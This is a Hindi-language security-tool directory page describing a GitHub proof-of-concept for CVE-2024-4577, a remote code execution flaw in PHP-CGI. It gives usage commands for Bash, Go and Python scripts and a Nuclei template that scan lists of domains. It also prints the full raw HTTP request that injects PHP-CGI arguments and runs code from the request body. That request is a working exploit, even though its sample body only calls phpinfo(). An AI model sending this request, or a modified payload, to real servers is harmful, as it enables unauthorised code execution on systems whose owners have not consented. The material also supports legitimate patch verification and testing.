Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4577-PHP-RCE — PHP RCE PoC CVE-2024-4577 के लिए bash, go, python और एक nuclei template में लिखा गया है | Kitploit
उपकरण/GitHubGitHub/zephrfish/cve-2024-4577-php-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubzephrfish/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

PHP RCE PoC CVE-2024-4577 के लिए bash, go, python और एक nuclei template में लिखा गया है

रिपॉजिटरी देखें
331362 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PHP RCE प्रमाण-अवधारणा

CVE-2024-4577: PHP-CGI में तर्क इंजेक्शन

अवलोकन

यह रिपॉजिटरी CVE-2024-4577 कमजोरी की जांच के लिए स्क्रिप्ट्स रखती है, जो PHP-CGI में एक तर्क इंजेक्शन समस्या है। आप इस कमजोरी के लिए डोमेन की सूची का परीक्षण करने के लिए दी गई Bash, Go, और Python स्क्रिप्ट्स का उपयोग कर सकते हैं। मैंने एक Nuclei YAML फ़ाइल भी जारी की है।

उपयोग

Bash स्क्रिप्ट

Bash स्क्रिप्ट का उपयोग करने के लिए, निम्न कमांड चलाएँ:

./CVE-2024-4577.sh /path/to/domains-list

Go स्क्रिप्ट

पहले, Go स्क्रिप्ट को CVE-2024-4577.go नामक फ़ाइल में सहेजें। Go स्क्रिप्ट को बनाने और चलाने के लिए:

  1. Go स्क्रिप्ट को बाइनरी में संकलित करें:

    go build -o CVE-2024-4577 CVE-2024-4577.go
    
  2. बाइनरी को डोमेन सूची फ़ाइल के तर्क के साथ निष्पादित करें:

    ./CVE-2024-4577 /path/to/domains-list
    

Python स्क्रिप्ट

पहले, Python स्क्रिप्ट को CVE-2024-4577.py नामक फ़ाइल में सहेजें। Python स्क्रिप्ट को चलाने के लिए:

  1. सुनिश्चित करें कि आपके पास requests लाइब्रेरी स्थापित है:

    pip install requests
    
  2. Python स्क्रिप्ट को डोमेन सूची फ़ाइल के तर्क के साथ निष्पादित करें:

    python CVE-2024-4577.py /path/to/domains-list
    
  3. (वैकल्पिक) यदि आप केवल कमजोर होस्ट प्रिंट करना चाहते हैं:

    python CVE-2024-4577.py /path/to/domains-list --quiet
    

प्रमाण-अवधारणा (POC) की व्याख्या

मैन्युअल रूप से कमजोरी का परीक्षण करने के लिए, आप निम्न POST अनुरोध भेज सकते हैं:

POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php phpinfo(); ?>

Nuclei टेम्पलेट

मैंने कमजोर उदाहरणों को स्कैन करने के लिए एक Nuclei टेम्पलेट भी बनाया है, यह v3 लेआउट योजना का उपयोग करता है और प्रयोगशाला वातावरण में परीक्षण किया गया है:

nuclei -t CVE-2024-4577.yaml -u <target-url>

डोमेन सूची उदाहरण

डोमेन की सूची में http/https जोड़ा जाना चाहिए ताकि वे सही ढंग से पढ़े जाएं।

http://example.com
http://testsite.com
http://vulnerablesite.com

उदाहरण आउटपुट

यदि कोई डोमेन कमजोर पाया जाता है, तो आउटपुट होगा:

http://example.com: Vulnerable
http://vulnerablesite.com: Vulnerable
टूल डाउनलोड करें